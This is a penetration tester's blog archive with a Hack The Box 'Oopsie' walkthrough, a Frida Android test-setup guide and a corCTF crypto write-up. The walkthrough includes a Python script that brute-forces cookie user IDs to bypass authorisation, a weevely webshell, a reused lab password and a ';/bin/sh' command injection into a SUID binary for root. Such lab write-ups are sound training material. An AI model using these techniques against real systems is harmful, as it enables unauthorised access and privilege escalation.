Kerz's Penetration Test.: August 2021

Saturday 28 August 2021

[HTB] Oopsie

I could see 2 opened ports which are port 22 and 80.

$ sudo nmap -PS -sS 10.10.10.28 -sC

Nmap scan report for 10.10.10.28

Host is up (0.68s latency).

Not shown: 998 closed ports

PORT STATE SERVICE

22/tcp open ssh

| ssh-hostkey:

| 2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)

| 256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)

|_ 256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)

80/tcp open http

|_http-title: Welcome

There was not a login page, or no feature.

There was another directory with view-source.

I could found 2 important information.

1. /cdn-cgi/login/login.php

2. /uploads/

I should keep the 2nd directory information, it will be useful information later.

I could see a login page.

The account was admin and password was "MEGACORP_4dm1n!!". The password was from the previous box.

I could see some menus and my cookie. The cookie was "user=34322; role=admin".

The uploads menu showed an error message "This action require super admin rights".

So, I should gain the super admin right. I changed the user number of the cookie.

import requests
from bs4 import BeautifulSoup

def exp():
    host, port = "http://10.10.10.28", 80
    for i in range(86574, 100000):
        cookies = {
                "user":str(i),
                "role":"admin"
                }

        r = requests.get(host+"/cdn-cgi/login/admin.php?content=uploads", cookies=cookies)
        if "Authenticating" not in r.text:
            print(f"Found: {str(i)}")
            exit()

if __name__ == "__main__":
    exp()

I found the user number to access the uploads menu.

I generated a webshell using weevely.

There was a user account and password.

I could access the box with SSH with the robert's credentials. I got the user flag.

Next, I should gain a root permission. I looked forward other vulnerabilities.

After few mintues, I checked a suspicous group name "bugtracker".

I found the suspicous binary /usr/bin/bugtracker.

- find / -type f -group kali 2>/dev/null

It runs with root permission.

I got the root permission after I put ";/bin/sh".

END

Wednesday 25 August 2021

Andorid Mobile App Assessment - Frida environment

This is how to implement test environment for Frida.

Below is my test environment for frida-server and frida-client:

|----------------------------------------------------------------------------------|

| |-------------------------| |------------------------------------| |

| | AVD | <---> | IP: 192.168.172.129 (NAT) | |

| | IP: 10.0.2.2 (NAT) | |------------------------------------| |

| |-------------------------| |

| Windows 10 |

| 192.168.1.101 |

|----------------------------------------------------------------------------------|

That's a simple test environment.

The frida-server is running on Android-Stuido AVD, and the frida-tools is running on the Ubuntu server.

Windows & AVD
1. copy the frida-server file to Android (/data/local/tmp).
1.1. adb.exe push /<your-path of frida-server file> /data/local/tmp/

2. go adb shell and run frida on AVD
2.1. adb shell; cd /data/local/tmp; chmod 755 ./frida-server; ./frida-server

Windows

3. adb forward port

3.1. .\adb.exe forward tcp:27042 tcp:27042

3.2. .\adb.exe forward tcp:27043 tcp:27043

3.3. then, it will forward the ports, but it listen for 127.0.0.1 only.

4.Windws forward port

4.1. netsh interface portproxy add v4tov4 listenport=27044 listenaddress=0.0.0.0 connectport=27042 connectaddress=127.0.0.1

4.2. netsh interface portproxy add v4tov4 listenport=27045 listenaddress=0.0.0.0 connectport=27043 connectaddress=127.0.0.1

4.3. netsh interface portproxy show all

4.4. then, it will forward the ports, but it listen for 0.0.0.0.

---------------------------------------------------------------------------------------------------------------|

| |---------------------------| |-------------| |

| | listening 27042 | --- 127.0.0.1:27042 ---> | <--- 0.0.0.0:27044 --- | frida-ps | |

| | listening 27043 | --- 127.0.0.1:27043 ---> | <--- 0.0.0.0:27045 --- | | |

| |--------------AVD-------| |--Ubuntu -| |

| |

|----------------------------------------------------------------------------------------Windows ----------|

Ubuntu

5. Connect to frida-server

5.1 frida-ps -H 192.168.1.101:27044

[Extra tips]

adb.exe logcat

Tuesday 24 August 2021

corCTF - writeup for crypto/fibinary

It is a simple crypto chall.

It provides below code and encrypted flag:

enc.py

fib = [1, 1]

for i in range(2, 11):

fib.append(fib[i - 1] + fib[i - 2])

def c2f(c):

n = ord(c)

b = ''

for i in range(10, -1, -1):

if n >= fib[i]:

n -= fib[i]

b += '1'

else:

b += '0'

return b

flag = open('flag.txt', 'r').read()

enc = ''

for c in flag:

enc += c2f(c) + ' '

with open('flag.enc', 'w') as f:

f.write(enc.strip())

flag.enc

10000100100 10010000010 10010001010 10000100100 10010010010 10001000000 10100000000 10000100010 00101010000 10010010000 00101001010 10000101000 10000010010 00101010000 10010000000 10000101000 10000010010 10001000000 00101000100 10000100010 10010000100 00010101010 00101000100 00101000100 00101001010 10000101000 10100000100 00000100100

I made simple brute-force code to decrypt the encrypted flag.

dec.py

fib = [1, 1]

for i in range(2, 11):

fib.append(fib[i - 1] + fib[i - 2])

def c2f(c):

n = ord(c)

b = ''

for i in range(10, -1, -1):

if n >= fib[i]:

n -= fib[i]

b += '1'

else:

b += '0'

return b

flag_enc = open('flag.enc', 'r').read()

dec = ''

for flag_blk in flag_enc.split(' '):

for c in range(0,127):

if c2f(chr(c)) == flag_blk:

dec += chr(c)

print(dec)

Flag:

corctf{b4s3d_4nd_f1bp!113d}